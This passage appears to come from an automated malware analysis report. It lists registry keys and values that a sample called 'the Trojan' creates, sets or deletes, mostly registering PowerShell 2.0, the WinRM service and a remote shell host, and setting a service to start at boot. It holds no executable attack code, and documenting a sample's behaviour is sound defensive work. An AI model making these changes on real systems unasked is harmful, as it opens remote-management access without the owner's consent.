[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\TypeLib]
"Version" = "1.0"
[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"Retention" = "0"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\KB968930]
"EventMessageFile" = "%SystemRoot%\System32\spmsg.dll"
[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}]
"(Default)" = "PSFactoryBuffer"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PublishingGroup" = "Management and Infrastructure Group"
[HKCR\Microsoft.PowerShellConsole.1\shell\open\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell.exe -p %1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\8f8:ad488\iis]
"PathWWWRoot" = "C:\Inetpub\wwwroot"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"Retention" = "0"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsPutSignature"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"ParameterMessageFile" = "%systemroot%\system32\kernel32.dll"
[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}\NumMethods]
"(Default)" = "6"
[HKLM\System\CurrentControlSet\Services\WinRM]
"DependOnService" = "RPCSS, HTTP, HTTPFilter"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"TypesSupported" = "7"
[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}]
"(Default)" = "IWSManEx"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"TSAware" = "1"
[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\AppID\{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}]
"(Default)" = "Microsoft Windows Remote Shell Host"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"UninstallCommand" = "%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe"
[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\InprocServer32]
"(Default)" = "%System%\WSMAUTO.DLL"
[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}\InprocServer32]
"ThreadingModel" = "Both"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ConsoleHostModuleName" = "%System%\WindowsPowerShell\v1.0\Microsoft.PowerShell.ConsoleHost.dll"
[HKCR\WSMan.Automation\CLSID]
"(Default)" = "{BCED617B-EC03-420b-8508-977DC7A686BD}"
[HKCR\WSMan.Automation.1\CLSID]
"(Default)" = "{BCED617B-EC03-420b-8508-977DC7A686BD}"
[HKLM\System\CurrentControlSet\Services\WinRM]
"Type" = "32"
[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational\EventForwarder-Operational]
"EventMessageFile" = "%systemroot%\system32\wevtfwd.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\8f8:ad488\iis]
"PathInetsrv" = "%System%\inetsrv"
[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\VersionIndependentProgID]
"(Default)" = "WSMan.Automation"
[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\8f8:ad488\iis]
"PathIISSamples" = "C:\Inetpub\iissamples"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\System\CurrentControlSet\Services\WinRM]
"DisplayName" = "Windows Remote Management (WS-Management)"
[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\TypeLib]
"Version" = "1.0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ\Regular]
"BitNames" = " rsError rsWarning rsTrace rsNone"
[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\0\win32]
"(Default)" = "%System%\WsmAuto.dll"
[HKCR\Microsoft.PowerShellConsole.1]
"EditFlags" = "131072"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstalledDate" = "1/4/2016"
"ReleaseType" = "Software Update"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCR\WSMan.InternalAutomation.1\CLSID]
"(Default)" = "{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\8f8:ad488\iis]
"PathIISAdmin" = "%System%\inetsrv\iisadmin"
[HKCR\WSMan.Automation\CurVer]
"(Default)" = "WSMan.Automation.1"
[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\ProgID]
"(Default)" = "WSMan.InternalAutomation.1"
[HKCR\.ps1xml]
"(Default)" = "Microsoft.PowerShellXmlData.1"
[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\NumMethods]
"(Default)" = "4"
[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"
[HKLM\System\CurrentControlSet\Services\WinRM]
"ImagePath" = "%WinDir%\System32\svchost.exe -k WinRM"
[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem10.PNF" = "1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"MaxSize" = "15728640"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8B CC 2B 2E 69 30 0F 48 6F 7A 6B E1 97 39 14 19"
[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}]
"(Default)" = "PSFactoryBuffer"
[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}]
"(Default)" = "PSFactoryBuffer"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"Sources" = "PowerShell"
[HKCR\AppID\{3feb2f63-0eec-4b96-84ab-da1307e0117c}]
"LaunchPermission" = "01 00 04 80 98 00 00 00 A4 00 00 00 00 00 00 00"
[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"MaxSize" = "20971520"
[HKLM\System\CurrentControlSet\Services\WinRM\Parameters]
"ServiceDll" = "%SystemRoot%\system32\WsmSvc.dll"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\1033]
"Install" = "1"
[HKCR\Microsoft.PowerShellScript.1\DefaultIcon]
"(Default)" = "%System%\WindowsPowerShell\V1.0\powershell_ise.exe,1"
[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\VersionIndependentProgID]
"(Default)" = "WSMan.InternalAutomation"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\8f8:ad488\iis]
"IISProgramGroup" = "Microsoft Internet Information Services"
[HKCR\Microsoft.PowerShellData.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell_ise.exe %1"
[HKLM\System\CurrentControlSet\Services\WinRM\Parameters]
"seRVicemAIN" = "ServiceMain"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\EventForwarder]
"TypesSupported" = "7"
[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\TypeLib]
"Version" = "1.0"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstalledBy" = "%CurrentUserName%"
[HKCR\Microsoft.PowerShellData.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}]
"AppID" = "{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstallerVersion" = "6.1.29.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"DisplayIcon" = "%System%\WindowsPowerShell\v1.0\WTRInstaller.ico"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\.psc1]
"Content Type" = "application/PowerShell"
[HKCR\Microsoft.PowerShellXmlData.1]
"EditFlags" = "131072"
[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}]
"(Default)" = "WSMan InternalAutomation Class"
[HKCR\Microsoft.PowerShellData.1]
"EditFlags" = "131072"
[HKCR\Microsoft.PowerShellXmlData.1]
"FriendlyTypeName" = "Windows PowerShell XML Document"
[HKLM\System\CurrentControlSet\Services\WinRM]
"ErrorControl" = "1"
[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\TypeLib]
"Version" = "1.0"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"ARPLink" = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930"
[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}]
"(Default)" = "IWSManResourceLocatorInternal"
[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\ProxyStubClsid32]
"(Default)" = "{F73C1438-71B4-4D91-AD13-1F889A03AC67}"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"AutoBackupLogFiles" = "0"
[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\ProxyStubClsid32]
"(Default)" = "{F73C1438-71B4-4D91-AD13-1F889A03AC67}"
[HKCR\WSMan.InternalAutomation\CLSID]
"(Default)" = "{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"NoRepair" = "1"
[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}]
"(Default)" = "WinRM WMI Provider for User Profile"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"UninstallString" = "%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe"
[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\WSMan.Automation.1]
"(Default)" = "WSMan Automation Class"
[HKLM\SOFTWARE\Microsoft\PowerShell\1]
"Install" = "1"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"RuntimeVersion" = "v2.0.50727"
[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}]
"(Default)" = "IWSManProvHost"
[HKCR\Microsoft.PowerShellModule.1]
"FriendlyTypeName" = "Windows PowerShell Script Module"
[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\InprocServer32]
"(Default)" = "%System%\WSMAUTO.DLL"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PackageVersion" = "1.0"
[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\InprocServer32]
"ThreadingModel" = "Both"
[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}\LocalServer32]
"ServerExecutable" = "%System%\winrshost.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"DisplayName" = "Windows Management Framework Core"
"InstallDate" = "20160104"
[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"Publisher" = "Microsoft Corporation"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"AllowProtectedRenames" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"ReleaseType" = "Software Update"
[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\NumMethods]
"(Default)" = "4"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsDelSignature"
[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\InprocServer32]
"ThreadingModel" = "Both"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\8f8:ad488\iis]
"PathIISHelp" = "%WinDir%\Help\iishelp"
[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}]
"(Default)" = "IWSMan"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"PowerShellVersion" = "2.0"
[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\ProgID]
"(Default)" = "WSMan.Automation.1"
[HKCR\Microsoft.PowerShellScript.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\V1.0\powershell_ise.exe %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Services\WinRM]
"DependOnGroup" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}]
"(Default)" = "WSMan Automation Class"
[HKCR\Microsoft.PowerShellScript.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"
[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}]
"(Default)" = "IHost"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Publisher" = "Microsoft Corporation"
[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\8f8:ad488\iis]
"UpgradeType" = "0"
[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\ProxyStubClsid32]
"(Default)" = "{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}"
[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\InprocServer32]
"(Default)" = "%System%\wsmplpxy.dll"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ApplicationBase" = "%System%\WindowsPowerShell\v1.0"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstallerName" = "Update.exe"
[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}]
"AppID" = "{3feb2f63-0eec-4b96-84ab-da1307e0117c}"
[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}]
"(Default)" = "Microsoft Windows Remote Shell Host"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PackageName" = "Windows Management Framework Core"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""
[HKCR\Microsoft.PowerShellScript.1]
"FriendlyTypeName" = "Windows PowerShell Script"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\WinRM]
"Description" = "Allows access to management information from local and remote machines."
[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}]
"(Default)" = "IWSManSession"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"HelpLink" = "http://go.microsoft.com/fwlink/?LinkID=163790"
[HKCR\WSMan.InternalAutomation.1]
"(Default)" = "WSMan Internal Class"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Type" = "Update"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCR\.psm1]
"(Default)" = "Microsoft.PowerShellModule.1"
[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\HELPDIR]
"(Default)" = "%System%"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsVerifyHash"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Microsoft.PowerShell]
"ConfigXML" = ""
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"CategoryMessageFile" = "%System%\WindowsPowerShell\v1.0\pwrshmsg.dll"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsCreateHash"
[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem10.inf" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}\ProxyStubClsid32]
"(Default)" = "{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}"
[HKCR\WSMan.Automation]
"(Default)" = "WSMan Automation Class"
[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"file" = "%systemroot%\system32\config\EventForwarding-Operational.Evt"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsIsMyFileType"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"URLInfoAbout" = "http://go.microsoft.com/fwlink/?LinkID=163792"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"RegistryLocation" = " HKLM,SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930"
[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\NumMethods]
"(Default)" = "4"
[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational\EventForwarder-Operational]
"TypesSupported" = "7"
[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\InprocServer32]
"ThreadingModel" = "Both"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ\Regular]
"Guid" = "24b9a175-8716-40e0-9b2b-785de75b1e67"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"SupportsCompatListeners" = "1"
[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}]
"(Default)" = "IShell"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""
[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}\InprocServer32]
"(Default)" = "%System%\winrmprov.dll"
[HKCR\.ps1]
"(Default)" = "Microsoft.PowerShellScript.1"
[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\TypeLib]
"Version" = "1.0"
[HKLM\System\CurrentControlSet\Services\WinRM]
"ObjectName" = "NT AUTHORITY\NetworkService"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\EventForwarder]
"EventMessageFile" = "%systemroot%\system32\wevtfwd.dll"
[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}\LocalServer32]
"(Default)" = "%System%\winrshost.exe"
[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"Active" = "1"
[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}]
"(Default)" = "Microsoft Windows WSMan Provider Host"
[HKLM\SOFTWARE\Microsoft\PowerShell\1]
"PID" = "89383-100-0001260-04309"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ConsoleHostAssemblyName" = "Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"
[HKCR\.psd1]
"(Default)" = "Microsoft.PowerShellData.1"
[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}]
"(Default)" = "IWSManEnumerator"
[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\InprocServer32]
"(Default)" = "%System%\winrssrv.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup]
"ServicePackCachePath" = "c:\windows\ServicePackFiles\ServicePackCache"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"EventMessageFile" = "%System%\WindowsPowerShell\v1.0\pwrshmsg.dll"
[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\TypeLib]
"Version" = "1.0"
The following service will be launched automatically at system boot up:
[HKLM\System\CurrentControlSet\Services\SENS]
"Start" = "2"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\8f8:ad488]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\8f8:ad488\iis]
The process mscorsvw.exe:2860 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\7ac727df\3ef4663b]
"F" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ConfigMask" = "4361"
"DisplayName" = "Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"SIG" = "EC BB F6 79 DE 07 9A 4F A7 CE DF 48 D6 49 CE 93"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"LastModTime" = "46 0B 44 E8 3A 47 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\3ef4663b\f\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\7ac727df\3ef4663b]
"F" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
